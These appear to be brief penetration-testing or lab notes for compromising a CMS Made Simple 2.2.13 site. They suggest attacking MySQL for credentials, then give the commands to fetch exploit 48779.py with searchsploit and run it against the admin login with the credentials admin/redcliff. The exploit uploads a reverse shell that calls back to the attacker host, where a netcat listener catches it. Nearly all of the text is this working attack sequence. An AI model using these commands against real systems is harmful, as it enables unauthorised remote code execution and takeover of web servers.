CMS Made Simple 2.2.13
[1]Attack Mysql and see if you can gather creds
[2]Authenticated exploit, requires access to CMS console to trigger reverse shell
[3]Exploit will upload a revshell on target, after firing off catch with netcat
searchsploit -m php/webapps/48779.py
python3 48779.py --url
http://192.168.101.184/admin/login.php
-u admin -p redcliff -lhost 192.168.101.160 -lport 1234
nc -nvlp 1234
Last updated